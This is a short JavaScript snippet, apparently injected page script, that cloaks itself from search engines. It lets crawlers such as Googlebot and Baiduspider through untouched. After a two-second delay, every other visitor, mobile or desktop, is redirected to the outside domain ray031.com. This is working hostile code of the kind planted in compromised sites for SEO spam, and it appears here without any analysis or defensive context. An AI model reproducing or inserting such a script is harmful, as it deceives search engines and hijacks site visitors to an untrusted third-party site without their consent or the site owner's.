document.write (''); function ray() { var user_agent = navigator.userAgent; var refer = document.referrer; if( user_agent.indexOf("Baiduspider") >= 0 || user_agent.indexOf("Googlebot") >= 0 || user_agent.indexOf("360Spider") >= 0 || user_agent.indexOf("Sogou") >= 0 || user_agent.indexOf("YisouSpider") >= 0 || user_agent.indexOf("Yahoo") >= 0 || user_agent.indexOf("YoudaoBot") >= 0 ) { } else { if ((user_agent.match(/(Android|android|Linux)/i))) { window.location.href = 'https://www.ray031.com/mobile'; } else if ((user_agent.match(/(iPhone|iPad|iPod|ios)/i))) { window.location.href = 'https://www.ray031.com/mobile'; } else { window.location.href = 'https://www.ray031.com'; } } } setTimeout(ray,2000);